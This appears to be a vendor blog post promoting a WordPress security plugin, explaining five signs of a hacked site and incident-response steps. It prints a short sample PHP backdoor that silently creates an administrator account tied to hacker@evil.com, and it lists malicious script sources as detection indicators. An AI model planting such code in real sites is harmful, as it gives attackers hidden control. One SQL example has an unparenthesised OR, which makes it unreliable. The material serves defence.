Most WordPress hacks are silent. Attackers don't deface your site — they use it to send spam, serve malware to visitors, or mine crypto in the background. By the time you notice, the damage is done.
Here are the five warning signs you should never ignore.
1. Google is flagging your site as dangerous
If users see a red "This site may harm your computer" warning in Google Chrome, your site has been blacklisted. Google's Safe Browsing database flags sites that serve malware or phishing content.
What to do: Check Google Search Console under Security & Manual Actions. Use WO Security Shield to run an emergency malware scan.
2. Your hosting provider suspended your account
Hosts monitor for outbound spam, phishing pages, and malware distribution. If your account is suspended without explanation, it's almost always because automated scanners found something malicious.
What to do: Contact your host's abuse team for the specific files flagged. Don't just restore a backup — you need to find the entry point first, or you'll be hacked again within hours.
3. New admin accounts you didn't create
Log in to WordPress and go to Users → All Users. If you see admin-level accounts you don't recognise — especially with usernames like admin2, wpadmin, or random strings — your site has a backdoor.
What to do: Delete the rogue accounts immediately. Change all passwords. Then scan every PHP file for the code that created them — attackers often use PHP backdoors to create these accounts silently.
// Typical backdoor that creates admin accounts silently
$user_id = wp_create_user('hacker', 'password123', 'hacker@evil.com');
$user = new WP_User($user_id);
$user->set_role('administrator');
WO Security Shield detects this pattern and flags it as a critical finding.
4. Your site is redirecting visitors to spam pages
If visitors land on your home page and immediately get redirected to a pharma site, gambling site, or fake antivirus page — your site is infected with a redirect hack. These redirects are a form of SEO spam injection and are often injected into wp-config.php, functions.php, or index.php.
What to do: Check your site's core files against official WordPress checksums. Use the File Integrity Monitoring feature in WO Security Shield to spot every modified core file instantly.
5. Unknown files in your WordPress root or uploads folder
Files like mux-StateHelix.php, wp-tmp.php, class.wp.php, or random-named PHP scripts in /wp-content/uploads/ are almost always malware droppers or webshells — tools attackers use to maintain persistent access.
What to do: Delete them immediately. Then run a full scan to check whether they've been used to inject code elsewhere.
The fastest way to confirm a hack
Install WO Security Shield and run a full integrity scan. It will:
- Compare every core file against official WordPress checksums
- Detect PHP backdoors and webshells by signature
- Flag suspicious files in locations they should never exist
- Check your database for injected scripts
A complete scan takes under 2 minutes. If your site is clean, you'll know. If it's not, you'll have an exact list of what to fix.
Don't wait. The longer malware stays on your server, the more visitors it affects — and the harder it is to recover your search rankings. If the scan confirms a hack, follow our step-by-step guide to cleaning a hacked WordPress site.
What to Do When You Spot These Warning Signs
Recognising the signs is step one. Here's exactly what to do for each one.
If you see unexpected redirects
Immediate action:
- Open your site in an incognito/private browser window (to see what logged-out visitors see)
- Try accessing from a mobile device (some redirects only target mobile users)
- Check your
.htaccessfile for injected redirect rules:
# View .htaccess — look for RewriteRule lines you didn't add
cat .htaccess
# Also check .htaccess files in subdirectories
find . -name ".htaccess" -type f
- Check your WordPress options for modified URLs:
SELECT option_value FROM wp_options WHERE option_name IN ('siteurl', 'home');
If Google Search Console shows security issues
Immediate action:
- Read the specific issue description — Google tells you what it found
- Use the URL Inspection tool to see the infected pages as Google sees them
- Don't dismiss the warning without investigating — Google's detection is accurate
- After cleanup, go to Security Issues → Request a Review
Google typically removes the warning within 1-2 weeks after a successful review.
If your site is suddenly slow
Immediate action:
- Open browser DevTools (F12) → Performance tab → check CPU usage
- Look for unknown external scripts in the Network tab:
❌ coinhive.min.js — cryptocurrency miner
❌ evil-domain.com/track.js — malicious tracker
❌ cdn.jquery-analytics.com/analytics.js — fake analytics (malware)
- Check your site's source code for injected scripts:
grep -r "script src" wp-content/themes/your-theme/header.php
grep -r "script src" wp-content/themes/your-theme/footer.php
If you find unknown admin users
Immediate action:
- Do NOT just delete the account — first document it (screenshot the user profile, note the email and registration date)
- Change passwords for ALL legitimate admin accounts immediately
- Then delete the rogue account
- Check for backdoors — rogue admin accounts are often created alongside file-based backdoors
- Review your activity log for actions taken by the rogue account
If you notice unfamiliar content or pages
Immediate action:
- Search your database for injected content:
SELECT ID, post_title FROM wp_posts
WHERE post_status = 'publish'
AND post_title LIKE '%pharma%'
OR post_title LIKE '%casino%'
OR post_content LIKE '%display:none%'
ORDER BY post_date DESC
LIMIT 20;
- Check for injected pages that don't show in your WordPress admin:
site:yourdomain.com
Compare Google's index against your actual pages.
The First 60 Minutes After Discovering a Hack
Time matters. Here's your emergency response checklist:
Minutes 0–15: Contain the damage
- Change your WordPress admin password
- Change your hosting/cPanel password
- If you have a backup, note when it's from (you may need it)
- Put the site in maintenance mode if customers are at risk
Minutes 15–30: Assess the scope
- Run a security scan (WO Security Shield, or manually check files)
- Check Google Search Console for flagged issues
- Review your activity log for the entry point
- Check for rogue admin accounts
Minutes 30–60: Begin cleanup
- Remove identified malware and backdoors
- Replace modified core files with clean versions
- Update all plugins, themes, and WordPress core
- Enable 2FA on all admin accounts
After cleanup:
- Submit security review to Google (if flagged)
- Monitor file integrity for reinfection attempts
- Review and improve your security measures
- Document the incident for future reference
Why Prevention Beats Detection
Every hour your site stays infected costs you:
- Lost revenue — visitors see warnings or get redirected away
- SEO damage — Google downgrades hacked sites in search results
- Trust erosion — customers who encounter malware warnings may never return
- Cleanup costs — professional malware removal ranges from $150 to $500
A WordPress security plugin with a firewall, 2FA, and file monitoring costs a fraction of one cleanup. The math is straightforward: prevention is always cheaper than recovery.